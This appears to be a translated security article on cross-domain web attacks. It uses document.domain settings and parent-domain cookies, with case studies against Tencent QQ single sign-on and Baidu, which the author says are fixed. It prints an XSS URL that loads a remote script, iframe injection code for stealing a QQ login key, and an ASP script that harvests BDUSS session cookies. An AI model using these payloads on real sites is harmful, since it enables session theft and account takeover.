Introduction to the cross-domain attack method for Web servers

Always wanted to talk about the concept of cross-domain Web attacks, I've accumulated a few cases and experience, so I want to write a document that lets you know about Cross-domain Web attacks, a Cross-domain Web attack is a web attack that exploits a Web site's cross-domain security settings, as opposed to a traditional attack, Cross-domain web attacks can directly attack and impact core business from some unimportant business on the site.

The traditional security thinking teaches us to divide the core business according to the demand of the assets, function, etc., the Non-core business security level generally does not have the core business high, gives us the illusion is the core business is attacked, the loss will not be very big, will not affect the core business, So it makes sense for security workers to understand the concept of cross-domain Web attacks.

0x01 Cross-domain attacks based on Ajax cross-domain settings

One of the headaches of using AJAX technology is how to cross the domain, the different domain names including subdomains, which are limited by the homology policy, cannot be requested by Ajax, and then a class of technology can be implemented across domains by setting document.domain. such as a.test.com and b.test.com, when two Web sites manipulate DOM interfaces via JavaScript document.domain= ' test.com ' After you set the site's domain to test.com, two sites are in the same domain, and you can perform various cross-domain operations. This is a convenient cross-domain technique for developers, but in the eyes of attackers this is a big back door, hackers only need to find a *.test.com any XSS vulnerabilities, in any one of the subdomains of the Web page can attack a.test.com and b.test.com across the domain.

Ajax Cross-domain Setting Another important point is that this cross-domain setting also affects the cognate strategy of the window reference relationship, such as Tencent Weibo site has document.domain= ' qq.com ' cross-domain settings, we can do an experiment on Tencent Weibo, in their own Tencent Weibo http:// t.qq.com/a link to any *.qq.com Web site (for example: http:// www.qq.com, open the Web site in Tencent Weibo and run the following script in the address bar using the Javascrit Pseudo protocol, and you will find that the Web page where Tencent Weibo is located is injected with an alert prompt box:

Javascript:window.opener.eval (' Alert (/xss/) ');
Finally, because Tencent Weibo site has been set up across the domain, so the *.qq.com of any one and Tencent Weibo has a window to refer to the relationship of the Web page, can go to Tencent Weibo cross-domain injection script run.

Case: Tencent single sign-on system cross-domain hijacking vulnerability

QQ Client installed a fast login plugin, in the client has logged in and QQ.exe in the running state, this fast login plug-in can automatically generate a and QQ number corresponding to the key, in IE browser access to each of the QQ site should use this key can be password-free one-click Login site. My analysis found that the most important security measure for this fast login plugin is that the key function of generating the key is to set up a trusting domain xui.ptlogin2.qq.com, that is, we can use this plugin to generate the key in the Xui.ptlogin2.qq.com Web page. This trust-domain security method for fast login Plug-ins is meant to prevent web pages from other unsecured domains from invoking the plugin, while the developer writes the Cross-domain settings of document.domain= ' qq.com ' on a page in xui.ptlogin2.qq.com. As a result, this trusting domain is in no shape. Through the QQ arbitrary station of an XSS vulnerability we can attack xui.ptlogin2.qq.com, first to the Web page of the Substation Cross-domain settings, and then through the frames page embedded xui.ptlogin2.qq.com cross-domain Settings page, since two Web pages are set to the same domain, the homologous policy takes effect, you can cross-domain The action frame injection script runs into the xui.ptlogin2.qq.com domain. Part of the attack code is as follows:

Http://product.tech.qq.com/simp_search.php?keyword= "></script><script/src=http://127.0.0.1/xss.js ></script>
Content of Xss.js:

Window.name = ' ... '//xui.ptlogin2.qq.com The attack script running within the domain is omitted
document.domain= ' qq.com '; Cross-domain settings
function Exploit () {crossqqdomain.location = "javascript:eval (window.parent.name); void (0)";}// Inject script through pseudo protocol in a frame with ID Crossqqdomain
document.write ("<iframe id= ' crossqqdomain ' src= ' http://xui.ptlogin2.qq.com/*.html ') onload=exploit" ></ Iframe> ");
Through the Window.name set is to invoke the fast login plug-in attack script code, the attacker visited our cross-station link, we can get to QQ a key login key, the consequences unimaginable.

0x02 cross-domain attacks based on cookie security

Previous documents about CSRF the "homology strategy" of cookies, which in fact only vaguely describes the role of the cookie domain field. Cookie domain field and browser conventions, such as the General cookie Domain field is set to the default www.test.com, level two domain name *. This cookie cannot be accessed under test.com, so many websites set the domain field of the cookie to. test.com solve the problem of cookie reading for level two domain names.

Case: Third-party substation caused by the fall of Baidu cookie security issues

After Baidu's passport login, Baidu will set a cookie value named Bduss to the client, the domain field for this value is. baidu.com, as follows:

set-cookie:bduss= Evas0ytvw91nufnnktnndhceuxzelbyz2t6vnnqc2vkndhqanhxv0q1a1p4tvjoqvfbqufbjcqaaaaaaaaaaapbesm9lhgacmf5c3r5bguaaaaaaaaaaaaaaa Aaaaaaaaaaaaaaaadgekv4aaaaaob6rxgaaaaacf1caaaaaaaxmc42ns4ynbk3nu0zn51gh; Expires=tue, 2030 00:00:00 GMT; path=/; Domain=.baidu.com
This cookie is Baidu's numerous two-level domain name share identity authentication cookie, under some coincidence I found Baidu third party website http:// zhishang.baidu.com loophole, control the zhishang.baidu.com host, this site's domain name just belong to Baidu's subdomain, then the server can receive Bduss This key cookie, because the host is IIS, So I wrote a simple ASP script to collect the cookie value in the HTTP request header, and some of the attack code is as follows:

<%
Dim SP,I,RF
SP = Split (request. ServerVariables ("Http_cookie"), "; ", -1,1) #通过服务器变量获取HTTP请求头中的COOKIE值
RF = Request.ServerVariables ("Http_referer")
For i=0 to UBound (SP)
If InStr (Sp (i), "Bduss") >0 Then
Txtfile=server.mappath ("Log.txt")
Set fso = CreateObject ("Scripting.FileSystemObject")
Set MyFile = Fso.opentextfile (txtfile,8,true,0)
MyFile.WriteLine (Date () & "" &time () & "" & RF)
MyFile.WriteLine (Sp (i) & Chr (13))
Myfile.close
Set fso = Nothing
Response.Cookies ("Bduss") = "Delete"
Response.Cookies ("Bduss"). Path= "/"
Response.Cookies ("Bduss"). Expires= (Now ()-1)
Response.Cookies ("Bduss"). Domain = ". Baidu.com"
End If
Next
Response.Redirect "Yun_qi_img/t_0028.gif" # 302 jump to the real picture
%>
Http://zhishang.baidu.com/c.asp#.gif (#是url注释) Such links as a picture posted in Baidu Bar, Baidu Hi, such as posts or logs, if the attacker visited the embedded similar pictures linked to the page, The browser will launch a GET request to the zhishang.baidu.com script, which takes a cookie with the Bduss value, and after the server's script obtains the cookie, the attacker can use the cookie to falsify the attacker's identity using the service on the other side.

0x03 on cross-domain web attack

There are many different types of cross-domain Web attacks, and only two of the most harmful are mentioned in this article, and the vulnerabilities mentioned in the case have been fixed. This article does not mention the defensive measures of such attacks, because this kind of web attack has been different from the traditional single point of attack, in fact, the major web sites and web programs at home and abroad have similar security issues, such security issues are not a separate case, but from the site architecture to consider the security issues.

The purpose of this article is not to make a cross domain Web attack but I hope that people through this kind of security issues to think more, so that the reality of the network is not absolute security, we face the problem of web security is still grim, application and security is an opposite, we need to find a balance between application and security.